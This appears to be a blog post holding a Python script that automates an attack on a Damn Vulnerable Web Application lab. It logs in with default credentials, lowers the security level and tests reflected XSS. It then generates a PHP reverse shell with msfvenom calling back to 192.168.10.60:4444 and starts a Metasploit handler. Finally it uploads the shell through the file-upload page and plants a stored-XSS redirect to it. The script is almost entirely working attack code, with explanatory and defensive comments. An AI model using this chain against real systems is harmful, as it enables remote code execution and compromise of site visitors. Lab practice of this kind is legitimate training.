requests으로 DVWA Low XSS

JoGeun 2018. 10. 21. 13:15
#login 
import os 
import re 
import sys 
import time 
 
import requests 
from bs4 import BeautifulSoup 
 
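# Log in to the DVWA instance at 192.168.10.134. The form is posted over plain
# HTTP, so the username and password below cross the network (and the proxy)
# unencrypted.
login_url = 'http://192.168.10.134/dvwa/login.php'
login_data = {'username':'admin', 'password':'password', 'Login':'Login'}
# Every request in this script is routed through a proxy on localhost:9000;
# if nothing is listening there, the first request fails with a proxy error.
proxies = {'http':'http://localhost:9000', 'https':'http://localhost:9000'}
# One session is reused throughout so the login cookie carries over to the
# later requests.
s = requests.session()
req = requests.Request('POST', login_url, data=login_data)
prepared = s.prepare_request(req)
resp = s.send(prepared, proxies = proxies)

soup = BeautifulSoup(resp.text,'lxml')
MESS1='Welcome to Damn Vulnerable Web App!'
# The login is judged by the first <h1> of the response. A page without any
# <h1> (error page, proxy error body) must count as a failed login rather
# than crash with AttributeError on `soup.h1.string`.
heading = soup.h1.string if soup.h1 is not None else None
if heading is not None and MESS1 in str(heading):
    print('[ ok ] login')
else:
    print("[ fail ] login")
    sys.exit(2)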
 
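#low level setting
# Switch the DVWA security level to "low" for this session. The result is
# verified by reading the first <em> element of the returned page instead of
# assuming the POST took effect.
security_url='http://192.168.10.134/dvwa/security.php'
security_data={'security':'low','seclev_submit':'Submit'}
resp=s.post(security_url,data=security_data, proxies=proxies)
soup=BeautifulSoup(resp.text,'lxml')
# A response without an <em> element (for example a redirect back to the
# login page) is treated as "not set" rather than raising AttributeError.
level = soup.em.string if soup.em is not None else None
if level is not None and 'low' in str(level):
    print('[ ok ] low setting')
else:
    print('[ fail] low not setting')
    sys.exit(3)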
 
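# Reflected-XSS check against the xss_r page. The names login_url/login_data
# are reused from the login step; here they hold the xss_r URL and its query
# parameters.
login_url='http://192.168.10.134/dvwa/vulnerabilities/xss_r/?'
login_data={'name':'<script>alert("hacked")</script>'}
resp=s.get(login_url, params=login_data,proxies=proxies)
soup=BeautifulSoup(resp.text,'lxml')
# The check passes only when the HTML parser finds a real <script> element
# inside <pre>, i.e. the `name` value was written into the page without
# HTML-encoding. If the application encodes its output there is no such
# element; that case must print "[ fail ] xss" instead of raising
# AttributeError on `soup.pre.script.string`.
pre = soup.pre
script = pre.script if pre is not None else None
if script is not None and "hacked" in str(script.string):
    print("[ ok ] xss")
else:
    print("[ fail ] xss")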
 
#msfvenom -p php/reverse_php LHOST=192.168.10.60 LPORT=4444 -f raw > attack.php 
# Runs msfvenom through the shell and redirects its output to attack.php in
# the current working directory. The payload type is a PHP reverse shell
# configured for 192.168.10.60:4444, so on the monitored side the observable
# is an outbound TCP connection from the web server's PHP process to that
# host and port.
print("[ info ] please wait a few minute.") 
# NOTE(review): the exit status of os.system is discarded, so the "[ ok ]"
# line below is printed whether or not the command succeeded.
os.system("msfvenom -p php/reverse_php LHOST=192.168.10.60 LPORT=4444 -f raw > attack.php ") 
print("[ ok ] attack.php created") 
 
# Text of a Metasploit resource script: it selects exploit/multi/handler with
# the php/reverse_php payload and starts it with `exploit -j -z`. The string
# is written unchanged to reverse_connection.rc below.
resource=""" 
use exploit/multi/handler 
set payload php/reverse_php 
set LHOST 192.168.10.60 
set RPORT 4444 
set ExitSession false 
exploit -j -z 
""" 
 
# 'w+' creates reverse_connection.rc in the working directory, truncating any
# existing file of that name.
fd =open('reverse_connection.rc','w+') 
fd.write(resource) 
fd.close() 
 
print("[ ok ] reverse_connection.rc file created") 
 
 
#msfconsole -r cmd 
# Opens msfconsole with the resource script in a separate xterm window. The
# trailing '&' backgrounds the command in the shell, so os.system returns
# without waiting for it.
os.system("xterm -e msfconsole -r reverse_connection.rc &") 
print("[ info ] please wait a few minute.") 
# Fixed 20-second pause; the "[ ok ]" message that follows is unconditional
# and does not reflect the state of the xterm/msfconsole process.
time.sleep(20) 
print("[ ok ] msfconsole -r <cmd>") 
 
# Multipart POST of attack.php to the DVWA upload page, in the form field
# `uploaded`, with the part's content type declared as text/plain although
# the filename ends in .php. A server-side control has to judge the upload by
# its extension and content, not by this client-supplied type, and should
# keep uploads in a location where they are not executed as PHP.
upload_url='http://192.168.10.134/dvwa/vulnerabilities/upload/' 
# NOTE(review): the file object opened here is never closed.
upload_files={'uploaded':('attack.php',open('attack.php','rb'),'text/plain')} 
upload_data={'MAX_FILE_SIZE':'100000','Upload':'Upload'} 
# The response is discarded, so the message below is printed whether or not
# the server accepted the file.
s.post(upload_url,files=upload_files,data=upload_data,proxies=proxies) 
print("[ o k ] attack.php") 
 
#<script>window.location="http://192.168.10.134/dvwa/hackable/uploads/attack.php"</script> 
# Stored-XSS step: a guestbook entry is posted to xss_s whose message field
# is a <script> element that sets window.location to the uploaded file's URL
# under /dvwa/hackable/uploads/. It only has an effect if the application
# later renders stored messages without HTML-encoding them; encoding on
# output (and a Content-Security-Policy that blocks inline script) is the
# application-side fix, and stored entries containing "<script" are the
# artefact to look for when reviewing the guestbook data.
xss_url='http://192.168.10.134/dvwa/vulnerabilities/xss_s/' 
xss_script='<script>window.location="http://192.168.10.134/dvwa/hackable/uploads/attack.php"</script>' 
xss_data={'txtName':'test1','mtxMessage':xss_script,'btnSign':'Sign+Guestbook'} 
# The response is stored in resp but not inspected; the script ends here.
resp=s.post(xss_url, data=xss_data,proxies=proxies)